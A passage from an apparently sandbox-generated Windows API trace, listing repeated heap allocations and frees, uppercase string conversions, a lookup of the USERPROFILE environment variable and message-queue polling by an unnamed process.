hHeap=0x25c0000) returned 1 [0205.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0205.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0205.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0205.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0205.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0205.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0205.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0205.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0205.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0205.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0205.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0205.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0205.832] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0205.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0205.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0205.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0205.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0205.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0205.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0205.833] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0205.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0205.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0205.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0205.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0205.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0205.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0205.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0205.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0205.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0205.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0205.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0205.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0205.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0205.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0205.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0205.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0205.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0205.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0205.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0205.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0205.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0205.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0205.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0205.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0205.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0205.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0205.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18d8 [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0205.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b3020 [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0205.835] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0205.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0205.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0205.836] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0205.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0205.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0205.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0205.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0205.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0205.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0205.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0205.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0205.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0205.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0205.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0205.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0205.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0205.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0205.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0205.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0205.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x24b3020 [0205.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0205.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0205.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0205.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0205.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0205.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0205.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0205.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0205.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0205.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0205.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0205.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0205.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16e8 [0205.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0205.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0205.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0205.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0205.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0205.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0205.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0205.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0205.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0205.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0205.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0205.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0205.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0205.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0205.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0205.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0205.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0205.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0205.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0205.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0205.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0205.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0205.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0205.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0205.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0205.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0205.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0205.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0205.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0205.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0205.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0205.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0205.839] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0205.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0205.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0205.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0205.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0205.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0205.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0205.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0205.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.840] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0205.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0205.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0205.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0205.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0205.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0205.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0205.841] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0205.841] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0205.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0205.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0205.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0205.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0205.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0205.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0205.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0205.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0205.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0205.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0205.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0205.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0205.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0205.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0205.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0205.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0205.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0205.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0205.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0205.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0205.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0205.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0205.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0205.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0205.842] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0205.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0205.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0205.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0205.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0205.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0205.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0205.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0205.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0205.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0205.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0205.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0205.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0205.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0205.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0205.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0205.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0205.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0205.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0205.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0205.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0205.845] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0205.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0205.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0205.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0205.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0205.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0205.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0205.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0205.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0205.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0205.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0205.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0205.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0205.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0205.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 